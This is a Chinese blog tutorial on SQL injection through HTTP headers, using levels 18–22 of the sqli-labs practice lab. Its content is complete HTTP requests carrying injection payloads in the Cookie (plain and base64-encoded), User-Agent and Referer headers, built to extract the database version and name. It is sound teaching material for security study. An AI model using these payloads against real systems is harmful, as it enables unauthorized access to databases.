SQL注入-第四节HTTP头部注入

最新推荐文章于 2024-11-05 14:55:45 发布

§666§

最新推荐文章于 2024-11-05 14:55:45 发布

阅读量48

点赞数

文章标签： sql http 数据库

本文链接：https://blog.csdn.net/weixin_51214674/article/details/132734850

版权

文章目录

- 4.1 HTTP头部注入

4.1 HTTP头部注入

SQL 注入点不止会出现在GET 参数或POST 参数中。

4.1.1Cookie注入

注入点在Cookie 数据中，以sqli-labs-20 关为例子。

GET /sqli-labs/Less-20/index.php HTTP/1.1
Host: 10.4.7.128
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.4.7.128/sqli-labs/Less-20/
DNT: 1
Connection: close
Cookie: uname=Dumb' and 1=2 union select 1,version(),database() #
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

4.1.2base64注入

注入的参数需要进行base64 编码，以sqli-labs-22 关为例子。

GET /sqli-labs/Less-22/index.php HTTP/1.1
Host: 10.4.7.128
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.4.7.128/sqli-labs/Less-22/
DNT: 1
Connection: close
Cookie: uname=RHVtYiIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSx2ZXJzaW9uKCksZGF0YWJhc2UoKSM=
Upgrade-Insecure-Requests: 1

4.1.3User-Agent注入

注入的参数在User-Agent 中，以sqli-labs-18 关为例子。

POST /sqli-labs/Less-18/ HTTP/1.1
Host: 10.4.7.128
User-Agent: AJEST' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://10.4.7.128
DNT: 1
Connection: close
Referer: http://10.4.7.128/sqli-labs/Less-18/
Upgrade-Insecure-Requests: 1
uname=Dumb&passwd=Dumb&submit=Submit

4.1.4Referer注入

注入参数在Referer 字段中，以sqli-labs-19 关为例子

POST /sqli-labs/Less-19/ HTTP/1.1
Host: 10.4.7.128
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://10.4.7.128
DNT: 1
Connection: close
Referer: AJEST' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1
Upgrade-Insecure-Requests: 1
uname=Dumb&passwd=Dumb&submit=Submit